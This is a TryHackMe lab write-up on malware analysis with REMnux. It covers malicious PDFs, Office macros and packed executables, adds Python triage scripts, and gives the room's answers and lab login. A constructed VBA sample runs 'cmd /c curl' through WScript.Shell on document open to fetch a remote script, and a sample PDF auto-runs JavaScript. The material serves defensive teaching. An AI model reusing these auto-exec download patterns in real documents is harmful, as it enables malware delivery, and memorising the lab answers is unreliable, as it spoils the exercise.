MAL: REMnux The Redux TryHackme

Shamsher khan
7 min read, May 19, 2021


By Shamsher khan. This is a writeup of the TryHackMe room “MAL: REMnux The Redux”.

https://tryhackme.com/room/malremnuxv2

What we learn in this room

  • Identifying and analysing malicious payloads of various formats embedded in PDFs, EXEs and Microsoft Office macros (the most common method that malware developers use to spread malware today)
  • Learning how to identify obfuscated code and packed files — and in turn — analyse these.
  • Analysing the memory dump of a PC that became infected with the Jigsaw ransomware in the real-world using Volatility.

IP Address: 10.10.32.28
Username: remnux
Password: malware

ssh remnux@10.10.32.28

Task 3. Analysing Malicious PDFs

Question 1. How many types of categories of “Suspicious elements” are there in “notsuspicious.pdf”?

Answer: 3

Question 2. Use peepdf to extract the JavaScript from “notsuspicious.pdf”. What is the flag?

peepdf’s summary confirms that JavaScript is present, but note also how it is executed: the /OpenAction entry runs the code as soon as the PDF is opened, with no user interaction needed.
To extract the JavaScript we use peepdf’s “extract” console command. peepdf is an interactive console, so rather than typing commands by hand we give it a script file through its script-loading option (-s). This takes a few steps to set up but is fairly trivial.
First, create a one-line script file for peepdf. The script runs extract js and redirects (>) the output into a file; the room names this output file “javascript-from-demo_nonsuspicious.pdf”, but any name will do.
Next, run peepdf with the name of the script (extracted_javascript.txt) and the PDF we want to extract from (notsuspicious.pdf). Because of our script, the JavaScript is written to the output file instead of the console, so read that file to find the flag.
To recap: “extracted_javascript.txt” (highlighted in red in the room’s screenshot) is our script, and “notsuspicious.pdf” (highlighted in green) is the original PDF that we think is malicious.

Question 3. How many types of categories of “Suspicious elements” are there in “advert.pdf”?

Run peepdf against the second sample: peepdf advert.pdf

Answer: 6

Question 4. Now use peepdf to extract the javascript from “advert.pdf”. What is the value of “cName”?

Answer: notsuspicious
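What peepdf does for the four questions above, as an added example that is not the room’s or peepdf’s own code: it counts the suspicious keyword categories across a PDF’s object dictionaries, follows every /JS entry to its payload (an inline literal string or a FlateDecode stream) the way extract js does, and pulls the cName out of an exportDataObject call. The sample PDF is constructed inline (not one of the room’s files; its cName simply mirrors the Question 4 answer), and the keyword list is a short subset of peepdf’s own table.

```python
import re
import zlib

SUSPICIOUS = ("/OpenAction", "/AA", "/JS", "/JavaScript", "/Launch",
              "/EmbeddedFile", "/URI")   # constructed subset of peepdf's table
OBJ_RE = re.compile(rb"(\d+)\s+0\s+obj\s*(.*?)\s*endobj", re.S)


def build_sample_pdf() -> bytes:
    """Constructed sample, not a room file: /OpenAction points to a JavaScript
    action held in a FlateDecode stream; the page adds an inline script via /AA."""
    js = (b'this.exportDataObject({ cName: "notsuspicious", nLaunch: 0 });\n'
          b'app.alert("nothing to see here");')
    packed = zlib.compress(js)
    objs = [b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
            b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
            b'<< /Type /Page /Parent 2 0 R /AA << /O << /S /JavaScript '
            b'/JS (app.alert("page opened")) >> >> >>',
            b"<< /Type /Action /S /JavaScript /JS 5 0 R >>",
            b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(packed)
            + packed + b"\nendstream"]
    out = b"%PDF-1.7\n"
    for num, body in enumerate(objs, 1):
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


def parse_objects(pdf: bytes) -> dict:
    """Map object number -> raw body (dictionary plus any stream)."""
    return {int(n): body for n, body in OBJ_RE.findall(pdf)}


def suspicious_categories(pdf: bytes) -> dict:
    """Count each keyword over object dictionaries only (stream bytes are
    skipped so compressed data cannot produce false hits). The number of
    keys is what peepdf's summary reports as suspicious-element categories."""
    found = {}
    for body in parse_objects(pdf).values():
        dictionary = body.split(b"stream", 1)[0]
        for key in SUSPICIOUS:
            hits = re.findall(re.escape(key.encode()) + rb"(?![A-Za-z])", dictionary)
            if hits:
                found[key] = found.get(key, 0) + len(hits)
    return found


def read_literal(data: bytes, start: int) -> bytes:
    """Read the PDF literal string whose '(' is at data[start], honouring nested
    parentheses and backslash escapes (a naive regex stops at the first ')')."""
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":                       # escaped byte: keep it verbatim
            out += data[i + 1:i + 2]
            i += 2
            continue
        depth += (c == b"(") - (c == b")")
        if depth == 0:
            break
        if i > start:
            out += c
        i += 1
    return bytes(out)


def decode_stream(body: bytes) -> bytes:
    """Return a stream's data, inflated when /Filter /FlateDecode is set."""
    m = re.search(rb"stream\r?\n", body)
    if not m:
        return b""
    data = body[m.end():body.rfind(b"endstream")]
    if b"/FlateDecode" in body[:m.start()]:
        data = zlib.decompressobj().decompress(data)   # tolerates trailing EOL
    return data


def extract_javascript(pdf: bytes) -> list:
    """Follow every /JS entry to its payload (inline literal or referenced
    stream): the walk peepdf's 'extract js' performs for you."""
    objs, scripts = parse_objects(pdf), []
    for body in objs.values():
        for m in re.finditer(rb"/JS(?![A-Za-z])\s*", body):
            pos = m.end()
            if body[pos:pos + 1] == b"(":
                scripts.append(read_literal(body, pos))
                continue
            ref = re.match(rb"(\d+)\s+0\s+R", body[pos:])
            if ref and int(ref.group(1)) in objs:
                scripts.append(decode_stream(objs[int(ref.group(1))]))
    return scripts


def find_cname(scripts: list):
    """cName argument of exportDataObject: the name of the file the PDF drops."""
    for js in scripts:
        m = re.search(rb'cName\s*:\s*["\']([^"\']+)["\']', js)
        if m:
            return m.group(1).decode()
    return None


if __name__ == "__main__":
    pdf = build_sample_pdf()
    print("suspicious elements:", suspicious_categories(pdf))
    scripts = extract_javascript(pdf)
    for js in scripts:
        print("---", js.decode(errors="replace"), sep="\n")
    print("cName:", find_cname(scripts))
```

Run it against a real file by replacing build_sample_pdf() with open(path, "rb").read(); it only understands plain objects and FlateDecode, so PDFs using object streams or other filters still need peepdf.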

Task 4. Analysing Malicious Microsoft Office Macros

Question 1. What is the name of the Macro for “DefinitelyALegitInvoice.doc”

Answer: DefoLegit

Question 2. What is the URL the Macro in “Taxes2020.doc” would try to launch?

Answer: http://tryhackme.com/notac2cserver.sh
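REMnux ships olevba (oletools) and ViperMonkey for these two questions; olevba lists a document’s VBA procedures, its auto-exec triggers, suspicious keywords and IOCs. The Python below is an added example, not the room’s or oletools’ code: it runs the same keyword triage over a constructed VBA dump, including a simplified version of the string deobfuscation olevba offers (folding Chr() calls and "a" & "b" concatenation). The procedure name and URL mirror the answers above; the rest of the macro is made up.

```python
import re

# Constructed VBA dump, standing in for what olevba prints for a .doc: an
# auto-exec trigger that calls a second procedure, a URL split across string
# concatenation, one Chr() byte and a line continuation (" & _").
SAMPLE_VBA = '''
Sub AutoOpen()
    DefoLegit
End Sub

Sub DefoLegit()
    Dim u As String
    u = "http://tryhack" & "me.com/" & Chr(110) & "otac2cserver" & _
        ".sh"
    Set sh = CreateObject("WScript" & "." & "Shell")
    sh.Run "cmd /c curl " & u & " -o %TEMP%\\up.sh", 0
End Sub
'''

AUTOEXEC = {"AutoOpen", "AutoExec", "AutoClose", "Auto_Open", "Document_Open",
            "Document_Close", "Workbook_Open"}
SUSPICIOUS = ["CreateObject", "WScript.Shell", "Shell", ".Run", "Environ",
              "URLDownloadToFile", "powershell", "cmd ", "Chr("]
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def procedures(vba: str) -> list:
    """Names of every Sub/Function, in order of definition."""
    return re.findall(r"^\s*(?:Public |Private )?(?:Sub|Function)\s+(\w+)", vba, re.M)


def autoexec_triggers(vba: str) -> list:
    """Procedures Office runs without a click: the macro's real entry point."""
    return [p for p in procedures(vba) if p in AUTOEXEC]


def deobfuscate(vba: str) -> str:
    """Fold Chr(n) into string literals and join "a" & "b" concatenations,
    also across ' & _' line continuations, so split IOCs read whole."""
    text = re.sub(r"Chr\((\d+)\)", lambda m: '"%s"' % chr(int(m.group(1))), vba)
    return re.sub(r'"\s*&\s*(?:_\s*)?"', "", text)


def suspicious_keywords(vba: str) -> list:
    """Keywords found in the raw or the deobfuscated text (Chr( only shows
    up in the raw text, WScript.Shell only once the pieces are joined)."""
    text = vba + "\n" + deobfuscate(vba)
    return [k for k in SUSPICIOUS if k in text]


def iocs(vba: str) -> list:
    """URLs visible once the concatenation is undone."""
    return sorted(set(URL_RE.findall(deobfuscate(vba))))


def triage(vba: str) -> dict:
    return {"procedures": procedures(vba),
            "autoexec": autoexec_triggers(vba),
            "suspicious": suspicious_keywords(vba),
            "urls": iocs(vba)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key:>11}: {value}")
```

The raw text alone would miss the URL and the WScript.Shell object entirely, which is why the deobfuscation pass runs before the IOC and keyword scans; real samples add more layers (StrReverse, Replace, Base64), for which olevba --deobf or ViperMonkey’s emulation is the right tool.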

Task 5. I Hope You Packed Your Bags

But first: Entropy 101

There’s a reason why I’ve waited until now to discuss file entropy in the malware series.

REMnux provides a nice range of command-line tools that allow for bulk or semi-automated classification and static analysis. File entropy is a strong indicator of how suspicious a file is, and it is a prominent characteristic that these tools look for within a Portable Executable (PE).

At its simplest, file entropy is a score of how random the data within a file is, on a scale of 0 to 8: 0 means the data contains no randomness at all (every byte the same), and a score approaching 8 means the bytes are close to uniformly random. (The scale is Shannon entropy in bits per byte, which is why the ceiling is 8.)

For example, encrypted or compressed files have a very high entropy score, whereas files made up of large runs of the same data, such as repeated 1's, have a low entropy score.

Okay…so?

Malware authors use techniques such as encryption or packing (we’ll come onto this next) to obfuscate their code and to try to bypass anti-virus, so these files have high entropy. If an analyst had 1,000 files, they could rank them by entropy score and analyse the highest-scoring ones first. High entropy is a triage signal rather than proof, though: legitimately compressed or encrypted content (installers, embedded images, certificates) scores just as high.

To illustrate, the room shows two sample files: the first would have a low entropy because its data follows a pattern, whereas the second would have a high entropy because there is no pattern to its data; it is far more random in comparison.

Packing and Unpacking

I briefly discussed this in my MAL: Introductory room, but that doesn’t do this topic justice.

We’ll start with a bit of theory (so bear with me here) on how packing works and why it’s used. A packer takes an executable as its input and outputs another executable, which has had some modifications made depending on the packer. For example, the new executable may have been compressed and/or encrypted.

Legitimate software developers use packing to reduce the size of their applications and to protect their work from being copied. It is, however, a double-edged sword: malware authors reap the same benefits to make reverse engineering and detection of their code hard to impossible.

Executables have what’s called an entry point. When the program is launched, the entry point is simply the address of the first code to be executed within the file, as illustrated in the room’s first diagram (Sikorski and Honig, 2012).

When an executable is packed, it must unpack itself before any of the original code can run. Because of this, packers move the entry point from its original location to what’s called the “unpacking stub”, shown in the second diagram (Sikorski and Honig, 2012).

The unpacking stub restores the executable to its original state in memory. Once the program is fully unpacked, execution jumps to the original entry point (OEP) and the real code begins to run, as the third diagram shows (Sikorski and Honig, 2012).

It is only at this point that an analyst can begin to understand what the executable is doing, as it is now in its true, original form.

Determining if an Executable is Packed

Don’t worry, learning how to manually unpack an executable is out of scope for this pathway. We have a few tools in our arsenal that do a sufficient job for most of the samples we come across in the wild.

A few characteristics indicate that a file may be packed:

  • Remember file entropy? Packed files have a high entropy!
  • There are very few imports; a packed file may import only GetProcAddress and LoadLibrary, which the unpacking stub uses to resolve everything else at runtime.
  • The executable may have sections named after a packer, such as UPX0 and UPX1 for UPX.

Demonstration

I have two copies of my application, one unpacked and one that has been packed.

In the room’s first screenshot, the unpacked copy has 34 imports, a noticeable amount, and the imports are quite revealing about what we can expect the application to do. The packed copy, in the second screenshot, presents us with only 6 imports.

We can verify that this was packed with UPX using tools such as PEiD, or by manually comparing the two executables’ sections and file sizes.

Look at that entropy! 7.526 out of 8! Also note the section names, UPX0 and UPX1, and the entry point sitting in UPX1... that’s our packer.
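The entropy scale from “Entropy 101” and the packed-file tells above (high entropy, packer section names, where the entry point lands) in one script, as an added example that is not the room’s or any tool’s own code. It uses only the Python standard library: shannon_entropy is the 0-to-8 score, parse_pe walks just enough of the PE header to get the entry-point RVA and the section table, and packing_indicators applies the checks. The PE image in build_sample_pe is constructed (headers and a section table only, it never runs) and mimics the UPX0/UPX1 layout from the screenshots; the packer section-name list is a short subset of my own choosing. Import counting is left out, since that needs the import directory, which pefile parses for you.

```python
import math
import random
import struct
from collections import Counter

# Section names left behind by common packers (constructed subset).
PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".petite",
                   ".MPRESS1", ".MPRESS2", ".themida", ".vmp0", ".vmp1"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a single repeated value, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(pe: bytes) -> dict:
    """Minimal PE32/PE32+ header walk: entry-point RVA plus (name, rva, size,
    raw bytes) per section. Enough for triage; use pefile for real work."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    entry = struct.unpack_from("<I", pe, coff + 20 + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(num_sections):
        off = coff + 20 + opt_size + 40 * i                     # section table entry
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, rva, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        sections.append((name, rva, max(vsize, raw_size), pe[raw_ptr:raw_ptr + raw_size]))
    return {"entry_point": entry, "sections": sections}


def packing_indicators(pe: bytes, threshold: float = 7.0) -> dict:
    """Apply the three tells from the text: per-section entropy, packer
    section names, and which section the entry point lands in."""
    info = parse_pe(pe)
    report = {"entry_section": None, "packer_sections": [], "entropy": {}}
    for name, rva, size, raw in info["sections"]:
        report["entropy"][name] = round(shannon_entropy(raw), 3)
        if name in PACKER_SECTIONS:
            report["packer_sections"].append(name)
        if rva <= info["entry_point"] < rva + size:
            report["entry_section"] = name
    ep = report["entry_section"]
    report["likely_packed"] = bool(report["packer_sections"]) or (
        ep is not None and report["entropy"][ep] >= threshold)
    return report


def build_sample_pe() -> bytes:
    """Constructed PE32 image (headers and section table only, never run):
    UPX0 is virtual, UPX1 holds random bytes standing in for the compressed
    payload, .rsrc holds a repeating pattern, and the entry point sits in UPX1."""
    rng = random.Random(1337)                                   # deterministic
    upx1 = bytes(rng.getrandbits(8) for _ in range(4096))
    rsrc = bytes(range(16)) * 64                                # entropy exactly 4.0
    secs = [("UPX0", 0x1000, 0x8000, b""), ("UPX1", 0x9000, 0x1000, upx1),
            (".rsrc", 0xA000, 0x400, rsrc)]
    opt_size, headers = 0xE0, 0x400
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x9010)                     # entry point in UPX1
    table, body, raw_ptr = b"", b"", headers
    for name, rva, vsize, data in secs:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, rva, len(data),
                             raw_ptr if data else 0, 0, 0, 0, 0, 0)
        raw_ptr += len(data)
        body += data
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(headers, b"\0") + body


if __name__ == "__main__":
    for key, value in packing_indicators(build_sample_pe()).items():
        print(f"{key:>16}: {value}")
```

The entry-point check matters because UPX0 is empty on disk (the unpacked code is written there at runtime) and UPX1 carries both the compressed image and the stub, so the entry point landing in a high-entropy section is a stronger signal than the entropy number on its own.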

Question 1. What is the highest file entropy a file can have?

Answer: 8

Question 2. What is the lowest file entropy a file can have?

Answer: 0

Question 3. Name a common packer that can be used for applications?

Answer: UPX

Additional Reading

A Look At Entropy Analysis

[BlackHat 2019] Investigating Malware Using Memory Forensics (Video)

Malware Threat Report — Q2 2020 (Avira)

Malware Detection in PDF and Office Documents: A survey

Cheatsheets

REMnux 7.0 Documentation

Volatility 2.4 Windows & Linux Profile Cheatsheets

Written by Shamsher khan

https://tryhackme.com/p/Shamsher
